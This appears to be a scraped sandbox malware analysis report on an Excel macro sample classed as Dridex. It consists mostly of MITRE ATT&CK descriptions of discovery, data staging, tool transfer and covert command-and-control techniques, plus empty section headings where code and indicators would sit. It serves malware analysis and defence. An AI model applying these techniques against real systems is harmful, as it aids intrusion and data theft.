Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report sample20210111-01.xlsm

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Dridex

Yara Overview

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "/opt/package/joesandbox/database/analysis/338158/sample/sample20210111-01.xlsm"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Module1.bas, Stream Size: 3215

General

VBA Code Keywords

VBA Code

VBA File Name: Sheet1.cls, Stream Size: 1614

General

VBA Code Keywords

VBA Code

VBA File Name: ThisWorkbook.cls, Stream Size: 999

General

VBA Code Keywords

VBA Code

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre